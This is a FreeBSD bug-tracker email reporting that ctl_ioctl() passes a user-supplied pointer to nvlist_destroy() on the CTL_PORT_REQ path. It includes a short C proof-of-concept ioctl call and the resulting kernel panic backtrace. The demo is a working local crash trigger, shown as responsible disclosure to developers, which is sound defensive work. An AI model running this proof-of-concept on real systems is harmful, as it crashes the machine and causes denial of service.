[Bug 266115] bad use of user pointer in cam_ioctl() CTL_PORT_REQ

From: <bugzilla-noreply_at_freebsd.org>
Date: Tue, 30 Aug 2022 15:52:41 UTC

            Bug ID: 266115
           Summary: bad use of user pointer in cam_ioctl() CTL_PORT_REQ
           Product: Base System
           Version: CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: rtm@lcs.mit.edu

In cam/ctl.c, ctl_ioctl(), for CTL_PORT_REQ, if user code passes in a
non-null req->result_nvl, but a null req->result, and fe->ioctl is
zero, then ctl_ioctl() calls nvlist_destroy() with the user-supplied

Here's a demo:

int main() {
  int fd = open("/dev/cam/ctl", 2);
  char buf[256];
  memset(buf, 0, sizeof(buf));
  strcpy(buf, "camtgt"); // driver
  *(unsigned long long *)(buf+72) = 0x8000000000000000; // result_nvl
  ioctl(fd, 0xc100e126, buf); // CTL_PORT_REQ

# uname -a
FreeBSD  14.0-CURRENT FreeBSD 14.0-CURRENT #40 main-n250928-b8170f38ccc7-dirty:
Mon Aug 29 13:09:55 EDT 2022    
rtm@xxx:/usr/obj/usr/rtm/symbsd/src/riscv.riscv64/sys/RTM riscv
# cc x.c
# ./a.out
panic: Fatal page fault at 0xffffffc0000a9b16: 0x8000000000000000
panic() at panic+0x2a
page_fault_handler() at page_fault_handler+0x1d6
do_trap_supervisor() at do_trap_supervisor+0x76
cpu_exception_handler_supervisor() at cpu_exception_handler_supervisor+0x70
--- exception 13, tval = 0x8000000000000000
nvlist_destroy() at nvlist_destroy+0x10
ctl_ioctl() at ctl_ioctl+0x183a
devfs_ioctl() at devfs_ioctl+0xbe
vn_ioctl() at vn_ioctl+0xba
devfs_ioctl_f() at devfs_ioctl_f+0x20
fo_ioctl() at fo_ioctl+0xa
kern_ioctl() at kern_ioctl+0x242
sys_ioctl() at sys_ioctl+0x120
syscallenter() at syscallenter+0xec
ecall_handler() at ecall_handler+0x18
do_trap_user() at do_trap_user+0xea
cpu_exception_handler_user() at cpu_exception_handler_user+0x72

You are receiving this mail because:
You are the assignee for the bug.